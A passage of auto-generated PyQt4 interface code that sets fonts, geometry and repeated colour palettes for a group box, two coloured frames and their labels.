self.groupBox.setGeometry(QtCore.QRect(20, 30, 811, 511))
font = QtGui.QFont()
font.setPointSize(20)
font.setBold(True)
font.setItalic(True)
font.setUnderline(False)
font.setWeight(75)
font.setStrikeOut(False)
self.groupBox.setFont(font)
self.groupBox.setObjectName(_fromUtf8("groupBox"))
self.frame = QtGui.QFrame(self.groupBox)
self.frame.setGeometry(QtCore.QRect(40, 90, 201, 181))
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 207, 61))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 239, 189))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 223, 125))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 103, 30))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(170, 138, 40))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 207, 61))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 231, 158))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ToolTipText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 207, 61))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 239, 189))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 223, 125))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 103, 30))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(170, 138, 40))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 207, 61))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 231, 158))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ToolTipText, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 103, 30))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 207, 61))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 239, 189))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 223, 125))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 103, 30))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(170, 138, 40))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 103, 30))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 103, 30))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 207, 61))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 207, 61))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 207, 61))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ToolTipText, brush)
self.frame.setPalette(palette)
self.frame.setAutoFillBackground(True)
self.frame.setFrameShape(QtGui.QFrame.StyledPanel)
self.frame.setFrameShadow(QtGui.QFrame.Raised)
self.frame.setObjectName(_fromUtf8("frame"))
self.label = QtGui.QLabel(self.frame)
self.label.setGeometry(QtCore.QRect(10, 150, 81, 16))
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(170, 170, 170))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ToolTipText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(170, 170, 170))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ToolTipText, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(170, 170, 170))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ToolTipText, brush)
self.label.setPalette(palette)
font = QtGui.QFont()
font.setPointSize(12)
font.setBold(False)
font.setItalic(False)
font.setWeight(50)
self.label.setFont(font)
self.label.setObjectName(_fromUtf8("label"))
self.frame_2 = QtGui.QFrame(self.groupBox)
self.frame_2.setGeometry(QtCore.QRect(290, 90, 201, 181))
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 85, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 170, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 127, 63))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 42, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(170, 56, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 85, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 170, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ToolTipText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 85, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 170, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 127, 63))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 42, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(170, 56, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 85, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 170, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ToolTipText, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 42, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 85, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 170, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 127, 63))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 42, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(170, 56, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 42, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 42, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 85, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 85, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 85, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ToolTipText, brush)
self.frame_2.setPalette(palette)
self.frame_2.setAutoFillBackground(True)
self.frame_2.setFrameShape(QtGui.QFrame.StyledPanel)
self.frame_2.setFrameShadow(QtGui.QFrame.Raised)
self.frame_2.setObjectName(_fromUtf8("frame_2"))
self.label_2 = QtGui.QLabel(self.frame_2)
self.label_2.setGeometry(QtCore.QRect(10, 150, 81, 16))
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(170, 170, 170))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
